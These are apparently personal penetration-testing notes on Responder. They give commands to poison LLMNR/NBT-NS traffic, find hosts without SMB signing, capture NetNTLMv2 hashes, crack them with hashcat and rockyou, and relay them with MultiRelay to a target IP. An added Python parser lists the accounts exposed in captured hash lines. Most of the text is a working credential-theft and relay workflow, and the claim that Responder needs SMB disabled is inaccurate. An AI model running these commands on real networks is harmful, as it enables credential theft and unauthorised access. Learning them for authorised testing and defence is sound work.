Open-source, Python-based LLMNR/NBT-NS/mDNS poisoner. In an internal pentest, run this tool first, even before running Nessus, Nmap or any other scanning software.

Responder works only if SMB is disabled

To check which systems do not use SMB signing:

python RunFinger.py -i 192.168.1.0/24

<aside> 💡 Always run RunFinger on the entire subnet rather than a single target.

</aside>

What is SMB signing?

SMB signing (also known as security signatures) is a security mechanism in the SMB protocol. SMB signing means that every SMB 3.1.1 message contains a signature that is generated by using the session key and the Advanced Encryption Standard (AES) algorithm.

Cracking the hash

python Responder.py -I eth0 -rdwv

<aside> 💡 When someone mistakenly types a wrong website or IP, the server doesn't know where this packet is going, so it is broadcast to the local network. Our machine then answers that it knows where this IP address belongs, and it captures the hash.

</aside>

When it does we will have this:

*fcastle::MARVEL:jdfj832jdkljr83447j:jfdjf48udk:...* and so on.

user : domain : hash

We will crack the hash with Hashcat:

hashcat -m 5600 hashes.txt rockyou.txt
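For the assessment report it helps to know exactly what a captured line contains and which accounts were exposed. The following is an added example, not part of the original notes or of Responder: a small parser for the NetNTLMv2 line layout that hashcat mode 5600 expects (user, empty field, domain, server challenge, NTProofStr, blob). The function names and the hex values in the sample are constructed for illustration.

```python
import re
from typing import NamedTuple, Optional

HEX = re.compile(r"^[0-9a-fA-F]+$")

class NetNTLMv2(NamedTuple):
    user: str
    domain: str
    server_challenge: str  # 8-byte challenge sent by the server side
    nt_proof_str: str      # 16-byte HMAC-MD5 response computed by the client
    blob: str              # rest of the client response (timestamp, nonce, target info)

def parse_netntlmv2(line: str) -> Optional[NetNTLMv2]:
    """Split one captured line into fields; return None if it is malformed."""
    parts = line.strip().split(":")
    # Six fields; the second is always empty, which produces the "::".
    if len(parts) != 6 or parts[1] != "" or not parts[0]:
        return None
    user, _, domain, challenge, proof, blob = parts
    for value, length in ((challenge, 16), (proof, 32), (blob, None)):
        if not HEX.match(value) or len(value) % 2:
            return None
        if length is not None and len(value) != length:
            return None
    return NetNTLMv2(user, domain, challenge.lower(), proof.lower(), blob.lower())

def exposed_accounts(lines):
    """Unique DOMAIN\\user names found in valid lines, in first-seen order."""
    seen = {}
    for line in lines:
        rec = parse_netntlmv2(line)
        if rec:
            key = (rec.domain.upper(), rec.user.lower())
            seen.setdefault(key, f"{rec.domain}\\{rec.user}")
    return list(seen.values())

# Constructed sample input: the hex values are made up, not real captures.
SAMPLE = [
    "fcastle::MARVEL:1122334455667788:" + "ab" * 16 + ":0101000000000000" + "00" * 24,
    "FCastle::marvel:8877665544332211:" + "cd" * 16 + ":0101000000000000" + "11" * 24,
    "fcastle::MARVEL:jdfj832jdkljr83447j:jfdjf48udk:...",  # the page's placeholder line
]

if __name__ == "__main__":
    for account in exposed_accounts(SAMPLE):
        print(account)
```

The placeholder line from the notes is rejected because its challenge and response fields are not hex; a real capture has a 16-character challenge and a 32-character NTProofStr.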

Relaying the hash or SMB Relay

We can pass this hash to another system, in effect saying: these are the credentials, please authenticate me. If the account behind this hash has access to the target system, the target system will give us access.

python MultiRelay.py -t 192.168.1.210 -u ALL